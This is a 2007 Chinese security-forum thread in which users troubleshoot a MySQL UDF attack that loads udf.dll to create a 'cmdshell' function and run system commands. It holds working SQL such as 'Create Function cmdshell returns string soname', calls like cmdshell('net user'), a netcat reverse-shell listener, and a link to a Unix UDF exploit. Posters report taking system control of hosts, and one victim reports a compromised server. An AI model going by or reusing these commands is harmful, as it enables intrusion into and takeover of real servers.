做个动画吧~看到很多人都测试未通过,哪位哥们放个动画上来.

我也导出失败
WIN2003
Access denied for user: 'ODBC@localhost' (Using password: YES)
我的是YES  跟猪三的不一样。 什么JB回事

此账号必须有对mysql的insert和delete权限以创建和抛弃函数
这句要解释到底能到一个怎么样的权限？

引用:

引用第27楼bugx于2007-02-08 23:49发表的:
此账号必须有对mysql的insert和delete权限以创建和抛弃函数
这句要解释到底能到一个怎么样的权限？

就是你在mysql库中要有插入元组的权限才能创建函数，创建了函数就能做事了，要还有删除元组的权限你就能完事后擦屁股走人。

引用:

引用第29楼ddy2003于2007-03-27 20:53发表的 :
多谢楼主，成功利用此法拿到一台主机系统权限

看到有人成功了,很欣慰.
不过也有不少人不成功,我猜测是因为PHP编写的问题(在这之前我都没学过PHP),至少DLL是经过很多测试的,问题可能就出在PHP文件里的SESSION编写,致使第二步就记不得MYSQL的账号了.
要是有人懂得PHP,希望有人能将PHP文件改写下.

导出成功,第三步时出错了.
数据库查讯出错，请检查SQL语句Create Function cmdshell returns string soname 'D:\\mysql\\data\\udf.dll';的语法是否正确。No paths allowed for shared library

请问是怎么回事?

cmdshell('net user')  

Shell无法启动,GetLastError=Shell无法启动,GetLastError=Shell
  
-----------------------------------

F:\dos>nc -vv -l -p 7758
listening on [any] 7758 ...
225.91.6.58: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [0.0.0.0] from (UNKNOWN) [225.91.6.58] 3695: NO_DATA
sent 0, rcvd 0

前面三步都顺利，但到了第四步时的情况却是：等很长时间后来个网页无法显示
但是打开那个网页正常，为什么

导出成功,第三步时出错了.
数据库查讯出错，请检查SQL语句Create Function cmdshell returns string soname 'D:\\mysql\\data\\udf.dll';的语法是否正确。No paths allowed for shared library

我也出这样的错误，楼主上哪去了来看看怎么回事嘛

引用:

引用第35楼foxbase于2007-04-23 18:42发表的 :
导出成功,第三步时出错了.
数据库查讯出错，请检查SQL语句Create Function cmdshell returns string soname 'D:\mysql\data\udf.dll';的语法是否正确。No paths allowed for shared library

我也出这样的错误，楼主上哪去了来看看怎么回事嘛

不好意思，有些日子没过来这里看看了。

你的MYSQL应该是5.0以上版本的，我在说明中也说了，对5。0以上版本你应该把DLL导出到Windows或System32目录，然后把“Create Function cmdshell returns string soname 'D:\mysql\data\udf.dll' ” 改成Create Function cmdshell returns string soname 'udf.dll' 。原因这在说明中也说了，因为5.0以上版本的MYSQL为了安全，不允许在此soname中加路径。

mysql> select version();
+-----------+
| version() |
+-----------+
| 4.0.18-nt |
+-----------+
1 row in set (0.03 sec)

mysql> create function my_udfdoor returns string soname 'C:\\Windows\\udf.dll';
ERROR 1127 (00000): Can't find function 'my_udfdoor' in library'


试过mix.dll成功了，但udf.dll 老出现这错误，望指教。

OK成功了.

楼主能写个asp的不能。
asp环境的也不少。

刚刚测试成功,好东西啊,不过说明再详细点就好了,我就转了不少的弯才成功的

引用:

引用第27楼bugx于2007-02-08 23:49发表的 :
此账号必须有对mysql的insert和delete权限以创建和抛弃函数
这句要解释到底能到一个怎么样的权限？

有对mysql.func表insert和delete的权限就行了.

mysql> use mysql;
Database changed
mysql> select * from func;
+----------+-----+---------+----------+
| name   | ret | dl   | type   |
+----------+-----+---------+----------+
| cmdshell |  0 | udf.dll | function |
+----------+-----+---------+----------+
1 row in set (0.00 sec)

mysql>

unix 下的udf有吗?

总的说要有ROOT权限.要有insert和delete才可以的嘛

大家都在这讨论入侵
请允许我弱弱的问一句
有什么办法可以防这个入侵方法吗?
服务器昨天晚上被日了  正是在windows目录下找到udf.dll文件.........

有什么办法可以防止吗?

设置MYSQL帐号在USER权限下。

引用:

引用第42楼zlty于2007-09-02 13:08发表的 :
unix 下的udf有吗?

http://www.0xdeadbeef.info/exploits/raptor_udf.c

一定要用双杠\\

本地测试通过不了

偶在渗透内网的时候，create function是成功了，但是运行cmd的时候 却出现了这么个问题。
我运行的是 select cmdshell('ipconfig /all');
回显的：
cmdshell('ipconfig /all')  

wmic:root\cli>
--------------------------------------------完成!
  
-----------------------------------

= 说 运行不了cmd命令了。
我用剑心的mysqlrookit  虽然运行不了cmd 但是 可以传文件，读取文件。
问题到底出现在哪里？ 麻烦楼主帮忙解答一下